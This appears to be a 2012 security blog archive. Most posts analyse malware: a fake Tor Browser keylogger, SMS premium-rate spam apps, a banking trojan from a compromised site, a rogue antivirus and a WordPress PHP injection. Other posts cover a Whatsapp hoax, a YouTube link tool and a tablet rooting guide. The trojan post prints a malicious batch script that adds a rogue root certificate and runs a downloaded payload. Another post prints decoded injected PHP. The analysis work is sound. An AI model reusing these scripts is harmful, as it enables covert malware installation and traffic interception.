Thursday, November 29, 2012

Analysis on TOR_Browser malware

694DD57886B32AD850224A783198D9FE, 10D52767B537B2F9F564481665B029E6, 761EA80A1C0019D6CB606BB646EBE57F

The sample has been already circulated around few weeks ago. But still found less information about this malware on internet. Thus, I decide to make some quick analysis.

Basic File Information
Received filename : Tor_Browser.exe
Original Filename : suf70_launch.exe
Executable vendor : Indigo Rose Corp.
File size : 707,793 bytes
MD5 hash received from report:
694DD57886B32AD850224A783198D9FE (Installer file 707,793 bytes) 10D52767B537B2F9F564481665B029E6 (Malicous PE file 9,080 bytes) 761EA80A1C0019D6CB606BB646EBE57F (Malicous PE file 74,240 bytes)
MD5 hash from official website:
Official installer file is about 22MB size while the sample is only 700kb.


The sample that we received is in PE installer file. Using TOR Project file icon. While in installation wizard, user will notice that there is no EULA appear on the screen:

The installer file is a malware dropper. Upon finished installation, the malware will not execute itself automatically. Thus, it will need user interaction to reboot their PC or run it manually from Start Menu.

If user run it from Start Menu, it will run itself from C:\Program Files\Tor Browser\Tor_Browser.exe. This PE file will then run another process from the following location:
C:\Users\<user profile>\AppData\Local\Temp\explorer.exe
Then run the %RANDOMNAME%.bat dropped at Windows Temporary folder. This will delete the previous file Tor_Browser.exe after the process has been terminated.

The running fake explorer.exe process will doing several malicious activity including keylogger, save keystroke in encrypted form, resolve IP into malware author DNS.

The explorer.exe will remain it process in memory.

Process Activity

Upon execution of the sample its create the following mutex:

This will make sure only single process of itself is running.

File & folder

Upon installation the following file has been created:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tor Browser\
    жÔØ Tor Browser.lnk

C:\Users\<user profile&gt>\AppData\Roaming\Help\
    CREATELINK.EXE (Legit file use to create a shortcut link)
    IconCacheBt.DAT (Encrypted fake explorer.exe file)
    IconConfig.DAT (Encrypted keylogger configuration)

C:\Program Files\Tor Browser\Tor_Browser.exe
C:\Windows\Tor Browser\uninstall.exe -- Non-malicious file
C:\Users\<user profile>\AppData\Local\Temp\explorer.exe

This malware sample also create a shortcut link as a startup to the following folder:
C:\Users\<userprofile>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

The shortcut file will be linked to the following file location:

Windows Registry

The malware will create the following registry key:

NOTE: This registry key use to mark the current machine as already infected.
The malware also read the following registry key:
and try to read the following value "~MHz". This value is storing a current CPU speed.

Keylogger Activity

Save key stroke from user input to the following file:
C:\Users\<user profile>\AppData\Local\Temp\win_32.sys

All captured key stroke is saved in encrypted form (Using compression library).


Trying to connect to the following IP:
Domain name found on the malware. Trying to resolve IP from the following DNS:


The malware sample (iexplore.exe) also contain a digital certificate embedded to it while fake explorer.exe does not have any digital certificate.

The digital certificate may be stolen and has been revoked.

Monday, November 26, 2012

Twitter Spam Bot 'Seducing' You

Well, not directly seduce you. It will mentioning your name on twitter first. It's almost a week after receiving several Tweet post that suddenly mentioned my nickname on my Twitter account. It is look suspicious when these person is not even following me. The text message also has nothing to do with my interest.

By the time I wrote this blog post, those spammer still actively tweet and randomly mentioning peoples name. Average sending around 20 tweet post per day.

As I post this screenshot it is not only that name keep randomly mentioning people but there is several others spammer using different name but almost the same message produced by their spam 'bot'. Virus Bulletin guys also send some screenshot regarding this twitter spam activity.

Most of spam 'bot' name is starting with prefix 'Caprigalxxx' ('x' could be random alphabet & number). But it could be other name also. Those 'random' account name is really exists and always use seduce picture to attract more people following them.

Here it is another example screenshot. Most of those spammer account always looks like this.

Sunday, September 2, 2012

Investigation behind Malaysian SMS spam with .jar attachment (0195451395).

I constantly received SMS spam message with .jar as an attachment. This is happened several times within 3 months. So, I decided to make some digging on who is the person behind this activity.

The phone number used by the spammer:
+6019-5451395 (Can be several other phone numbers)

The SMS message contain a URL which is will redirect to another server that provide a download link:
hxxp:// ---> hxxp://

The .jar file look suspicious and inappropriate way to promote sometime with such attachment. Lets try to access on IP with browser.

The IP is resolved to domain name . Seem like it's running with IIS on Windows machine. Now lets NMAP it.

Host is up (0.011s latency).
Not shown: 979 closed ports
21/tcp    open     ftp            Microsoft ftpd
25/tcp    filtered smtp
80/tcp    open     http           Microsoft IIS httpd 7.5
| http-methods: Potentially risky methods: TRACE
|_http-title: 403 - Forbidden: Access is denied.
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
445/tcp   filtered microsoft-ds
593/tcp   filtered http-rpc-epmap
1026/tcp  filtered LSA-or-nterm
1027/tcp  filtered IIS
1433/tcp  open     ms-sql-s       Microsoft SQL Server 2008
2383/tcp  open     ms-olap4?
3389/tcp  open     microsoft-rdp  Microsoft Terminal Service
4444/tcp  filtered krb524
6129/tcp  filtered unknown
6667/tcp  filtered irc
49152/tcp open     msrpc          Microsoft Windows RPC
49153/tcp open     msrpc          Microsoft Windows RPC
49154/tcp open     msrpc          Microsoft Windows RPC
49155/tcp open     msrpc          Microsoft Windows RPC
49160/tcp open     msrpc          Microsoft Windows RPC
49161/tcp open     msrpc          Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at
t.cgi :
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista (94%), FreeBSD 6.X (86%)
Aggressive OS guesses: Microsoft Windows Server 2008 SP2 (94%), Microsoft Windows 7 (94%), Microsoft Windows Vista SP0 or SP1, Server 2008 SP1, or Windows 7 (94
oft Windows Server 2008 (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows 7 Professional (93%), Microsoft Windows Server 2008 Beta 3 (93%), Micro
ws 7 Ultimate (92%), Microsoft Windows Vista Business SP1 (91%), Microsoft Windows Vista Home Premium SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 6 hops
Service Info: OS: Windows

TRACEROUTE (using port 8888/tcp)
1   8.00 ms
2   5.00 ms
3   5.00 ms
4   8.00 ms
5   12.00 ms (
6   11.00 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 59.76 seconds

Well, the following is the only port that can be accesses by public:
21/tcp    Microsoft ftpd
80/tcp    Microsoft IIS httpd 7.5
1433/tcp  Microsoft SQL Server 2008
2383/tcp  ms-olap4?
3389/tcp  microsoft-rdp  Microsoft Terminal Service
49152/tcp Microsoft Windows RPC
49153/tcp Microsoft Windows RPC
49154/tcp Microsoft Windows RPC
49155/tcp Microsoft Windows RPC
49160/tcp Microsoft Windows RPC
49161/tcp Microsoft Windows RPC

Now we need to take a look on the .jar file. First of all let see how it's look like when running on the phone. In this case I use Nokia Emulator.

Once victim user run the spam app it will instantly popup a message to send a message to the 33375 number. If user click/tap on Yes button it will automatically subscribe RM3.00 for another spam data. Your credit will be 'stolen' for RM3.00 monthly.

As the details SMS traffic shown on the image above. Let's take a look on .jar source code below:

The variables paramString1 and paramString3 will corresponds to the manisfest file.

If we take a look on 'c' class on the source code there is another shorten link which is will redirect to their Terms and Conditions web page.

The shortened link will be redirect as the following:
hxxp:// ---> hxxp://

Based on their TnC, it seem that Million Progain Sdn Bhd (916763-X) is responsible for receiving payment from the user. Several TnC also has been violated by this company. I'll keep the details about this company because it seem lead to more abusive services.

Sunday, August 26, 2012

Whatsapp Hoax Message Still in Circulation

It seem that a viral message still in circulated around my Whatsapp with hoax content. It has been a few months already since it first appearance on January 2012. Hopefully no more forwarded message like this again.

Full hoax message:
Message from Jim Balsamic (CEO of Whatsapp) we have had an over usage of user names on whatsapp Messenger. We are requesting all users to forward this message to their entire contact list. If you do not forward this message, we will take it as your account is invalid and it will be deleted within the next 48 hours. Please DO NOT ignore this message or whatsapp will no longer recognise your activation. If you wish to re-activate your account after it has been deleted, a charge of 25.00 will be added to your monthly bill. We are also aware of the issue involving the pictures updates not showing. We are working diligently at fixing this problem and it will be up and running as soon as possible. Thank you for your cooperation from the Whatsapp team” WhatsApp is going to cost us money soon. The only way that it will stay free is if you are a frequent user i.e. you have at least 10 people you are chatting with. To become a frequent user send this message to 10 people who receive it (2 ticks) and your WhatsApp logo

Whatsapp is already announced that this is really hoax through their blog. .

Tuesday, August 14, 2012

Trojan Banker/Password Stealer (B99A6FF84E4404488D789F5D56593735)

Yesterday, I just found one of local website has been compromised and embedded with malicious code. Once user visiting the website, by allowing the Java applet the malware will be downloaded and installed.

The picture above show you that you will be prompted to use Java plug-in to use some 'features' on this website. Lets take a look on the webpage source code. The red highlighted on the picture below is a Windows Batch command that will drop a VB Script file allowing it to download another malware (Windows executable) from Israel website. The website is also possibly has been compromised.

As we can see, the main page of the website has been embedded with extra code. At the top of it is calling the Java applet (Dantas.jar). This Java applet help to run the Windows Batch command. Below is the Java applet code.

If the Windows Batch Command successfully executed, it will save all the VBScript code into Windows temporary directory as a eden.vbs. Then, run the eden.vbs file to perform download and run the malware executable file.

At the bottom of the website also has been embedded with some scam pharma viagra hyperlink.

Now we need to take a look closer on the PE file downloaded from the following link:
hxxp:// (a1d2a281980fdd75546557a9ba6de0a6)

The PE file is actually a SFX file. It is containing several file including certificate from the malware author.

FileName MD5 Desc.
certadm.dll AED39116FE12C5550975043DA1D1B244 Microsoft Certificate Services Admin
certnew.cer 2B742FEB1883EE5CB418B1CBAB145A7D Fake Security Certificate
certutil.exe 711DB2EF10B6C2AB2080698AEC6C6D08 Cert Util.exe
givetome.exe 6D2C398E03397C9D089EDC0F00AB3FCB
jeovahjireh.exe 0B2BF362548B244477D9FFB613AF54D4 Malware

The only file are suspicious is 'jeovahjireh.exe'. So we need to take a look closer on this. The file is compressed with UPX 3.07. The PE file is actually some kind of Bat2Exe file binder. Inside the PE file contain Windows Batch Command.
@break off

echo 274087083240932840982409820482048282830482429384234932408270983238 > %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat

set inf=0
set exe="%temp%\msavc.exe"

if exist %temp%\%USERNAME%.dll goto mapa

> %temp%\%USERNAME%.dll echo y

%temp%\givetome.exe "%exe%"

del "%temp%\leiame.txt"

ECHO -------------------------------------------------------------------------------
%tmp%\certutil.exe -addstore root %tmp%\certnew.cer
certutil -addstore root %tmp%\certnew.cer

cmd.exe /c "%exe%"

del /F %tmp%\certnew.cer
del /F %tmp%\certadm.dll
del /F %tmp%\certutil.exe
del /F %tmp%\givetome.exe

echo fhsdkjhfkjdsfkjdsfhdskhfjkhjkhdsjkhfkjsdhfkjsdhfkjdsfds > %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat

. . .

echo jfdeidhpjrher093u40ruhdfuhisufsd90fu43u90urifhdsjfsiofkjsofsdjfsdfdjhfsd >> %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat
echo adgfsvgf354bvt2435tvb234rtg234vtrvc5234tvc254 >> %temp%\xhuahushbnnmf.dat.dat

The code is a bit lengthy and some kind of semi obfuscated. Most of the code are useless. I just cut off some of the junk code.

What the Windows Batch Command do is actually download another PE file from the following URL:

The *.jip file will be named as 'msavc.exe' and saved in temp directory. After that it will add the 'certnew.cer' certificate onto the infected machine as a root.

Then, it execute the 'msavc.exe' using cmd.exe. All bundled file will be delete then (certnew.cer, certadm.dll, certutil.exe, givetome.exe).

Now we need to take a look on the new downloaded PE file (B99A6FF84E4404488D789F5D56593735) named as 'msavc.exe'. This file has been packed with UPX 3.08 and written with Borland Delphi.

Based on VirusTotal result the PE file is possibly a trojan stealer, password stealer or trojan banker. Which is stealing user information on victim PCs.

As we can see on the network traffic it will try to access to the following URL followed with parameter content:

The domain name is still active but the content of the given URL is not available anymore.

Several mutex also created by this malware. The malware also crawling into several sensitive directory.

It also make changes on a lot of places on Windows registry to lower the security setting and get internet settings information.

Online Sandbox Result:

Monday, August 13, 2012

Live Security Platinum (RougeAV)

Just couple of weeks ago I just receive a rouge av sample the disguise as 'Live Security Platinum'. Although this malware is already discovered by other people few months ago. Once this malware is installed all your executable file will be mark as 'infected'. None of your file can be executed until you purchase their 'security' antivirus program. Lets take a look a basic dynamic analysis here. In this write up I'm not covering in detail about removing it from your system.

The malware that I received is from a compromised website that has been embedded with java object file that require users to allow their browser to execute the .jar file. This .jar file will the download the .exe install of the 'Live Security Platinum' malware.

The snapshot above show the first run of the malware which is check the latest update, download an install. The installed path will be located on user program data. See the image below.

After finished install it will automatically doing a fake 'scan'. At this time, all your application cannot be execute and has been blocked by the malware.

If you try to run any application on your computer, you will get fake notification that say your computer has been infected by 'malware'.

It will keep remind you to update and purchase their 'software'.

Lets give a try by entering a valid serial number to this malware registration form. The key that I was entered is AA39754E-715219CE. This key is already circulated on the internet. So, I just use it for easy removing the infection.

Once you click on 'Activate' button you will prompt about your successful register their 'product'. All your application now can be able to run normally. Now you will notice that the rouge AV window has been change to light blue color and there an extra shortcut icon on your desktop. It is a shortcut URL to access to the malware website.

If we try to open up the URL you will see there is online user guide for user to read. Until now the website is still accessible to the user.

For removal, MalwareBytes Anti-Malware would be fine to clean all the infection.

Saturday, May 26, 2012

Parasite PHP script on victim website (

While helping victim website removing phishing site and doing patching I just found interesting malicious code inside the Wordpress based website. The case begin when the victim site hosted a phishing site. The phishing web founded on several directory which is disguised as CIMB Bank. While updating with new Wordpress version and all the plugins I just notice there is something wrong with the size of index.php files. I also installed the SIG (Silent Is Golden) plugins to hide all the directory traversal. It will install an empty index.php file.

After finishing all the basic patches, I just notice the 'empty' index.php file is not empty. Open up the index.php file and found this:

This is definitely not good. Lets decode the base64 encoded eval() part and see what we got.
if (!$qazplm){
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"") or stristr($referer,"") or stristr($referer,"") or stristr($referer,"") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"") or stristr($referer,"") or stristr($referer,"")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){

The decoded code above shows that any matched URL from referer will be notify the '' via referer. The script has been set not to run on IE7. The suspicious file that doing this infection is coming from the Wordpress plugins script which is from '/wp-admin/plugins.php'. Let's take a look.

Well, just what I expected. There is an infection script on the beginning of file and if we take a look at the bottom file there is a huge base64 encoded string with eval(). After decoding a while seems like all the encoded script are the same and randomly put the code within the plugins.php. This cause the plugins.php generate many error.

Since the infection has been affected on all .php files with the same scripts, I decided to replace all Wordpress file with the new one. After that, there is still left some infected script especially on their custom theme. Need a special script to crawl and find all the infected file. Thanks to for writing a nice PHP script to detect PHP web shell which is also can be use in this case. After run the script found more than 100 PHP file still got infected. Remove some unused plugins and themes and some have to fix it manually.

The domain name '' seem already down. I can't go further analysis but there is other guys already analyzed what was happened. As I noticed that is is not only affected on Wordpress but also other popular CMS like Joomla, Drupan and so on.!topic/webmasters/SuUGJWwbqeA

Thursday, May 17, 2012

CyberSecurity Malaysia launch its own DNSChanger detection page

CSM just release another free services for checking DNSChanger trojan existence. By just simply visiting the following website you will be notice whether your current PC/notebook is infected with DNSChanger malware or not.

If your PC is clean you will be notice as 'Congratulation!' with green background otherwise you will be detected as red background. They also provided a free removal tools for Mac and Windows users.

Thursday, May 3, 2012

Windows 8 Forensics Guide

Just reading and share something before I'm going to sleep. It is basic understanding about next generation of Windows called Windows 8. Pretty good for advanced user to known little bit more 'in-depth' how Windows folder, registry, users and system variables, and so on works and located. For malware analyst its probably good to known for future malware infection cases.

Friday, April 13, 2012

Antap v1.0a - Dapatkan Pautan Youtube Anda


Apakah perisian ini?

Perisian ini diberinama Antap v1.0 (Alpha). Secara asasnya perisian kecil ini akan cuba mendapatkan pautan Youtube dari laman web tertentu yang memerlukan anda klik pautan 'Share' atau 'Like' terlebih dahulu untuk menonton video tersebut.

Kenapa perlunya perisian ini?

Ada sesetengah pengguna mungkin tidak berminat untuk menggunakan perkhidmatan web tertentu yang memerlukan anda menekan butang 'Share' atau 'Like' terlebih dahulu sebelum boleh menonton video kegemaran anda. Teknik sesetengah laman web ini hanya untuk mendapatkan jumlah pelawat yang secara rambang sahaja.

Secara asasnya, kesemua video tersebut telah di host kan di laman Kebanyakan laman web 3rd party ini direka untuk mendapatkan jumlah pengguna dari 'Like' atau 'Share' secara rambang oleh pengguna.

Sesetengah pengguna akan mendapati ianya sangat mengganggu (Annoying). Berikut antara laman web yang digunakan:

5. (By pass Digg Facebook App)
6. (By pass Digg Facebook App)
7. (By pass Zakolik Facebook App)
8. atau pautan yang disalin dari facebook.

Bagaimana cara menggunakannya?

Ikuti langkah mudah berikut:

1. Muat turun perisian ini. (Perisian ini memerlukan .Net Framework 2.0 untuk digunakan - Klik sini sekiranya belum ada)

2. Run terus perisian ini. Lihat imej dibawah.

3. Dapatkan URL yang anda ingin menonton video tersebut. Copy dan paste pada program Antap ini. Lihat contoh imej dibawah:


4. Kemudian klik butang GO! dan Youtube link akan terpapar.

5. Jadi, hanya perlu klik pada pautan Youtube tu untuk menonton. Selamat mencuba!

Muat Turun

Klik disini untuk muat turun.

NOTA: Perisian ini tidak mengandungi apa-apa virus atau kod yang mencurigakan. Anda juga boleh membuat imbasan dari perisian antivirus anda untuk melihatnya sendiri.

Versi Web Boleh diakses disini

Wednesday, January 4, 2012

Root: Samsung Galaxy Tab 8.9 GT-P7300

Just bought a new Samsung Galaxy Tab 8.9 P7300. Well, there's a lot of cool things we can do besides of playing games, social networks, notes, or whatever entertainment. For some of you probably software developer might want more 'fun' with it. But with factory settings nothing much we can do even you can't run a software as simple as phone call apps or access to a little special command on terminal console. So, before we start read the following:

Warning: Please make sure you have a backup copy of your firmware.
Warning: Please make sure backup all your important data.
Warning: Your warranty may get void once doing this process.
Warning: Recommended to install SuperUser app to get prompt permission when launching an apps with root level.
Warning: I did on Samsung Galaxy Tab 8.9 P7300 + Android 3.1 (Honeycomb) ONLY. Never try yet on other devices.
Disclaimer: The author of this write-up do not take any responsibilities for any damage causes by this action.

Follow step by step below:

1. First of all download this file package first. Download here >>

2. Put the into the root directory (No need to extract).

3. Turn OFF your device.

4. Then turn ON your device by holding Power and Volume Down button. Repeat this process if you are not successful.

5. If success, you'll get two icon on the screen which is Recovery and Download Mode. See picture above.

6. Choose Recovery Mode on your left by pressing Volume Down button then press Volume Up button for confirmation.

7. Choose 'apply update from /sdcard' by using your volume up/down button. Make sure you choose the '' on your root storage. Then press Power button to confirm.

8. You will get 'Install from sdcard complete' message if successful.

9. Now choose 'reboot system now' to restart your device. Your device should be rooted now.

10. You can verify whether your device is successful rooted or not by opening Terminal console and type 'su' and ENTER. Then type 'id' and ENTER. You'll see your user id now is 'root' as shown in image below.

At this point any software that need a higher access level will be able to install and run as a root privilege. For example VPNC Widget, Samba Filesharing, Superuser and so on. Have a nice day.

UPDATE (09/01/2012):

Another two devices from a friend of mines which is using Samsung Galaxy Tab 7.0+ and Samsung Galaxy Tab 10.1 seem to be work with those step.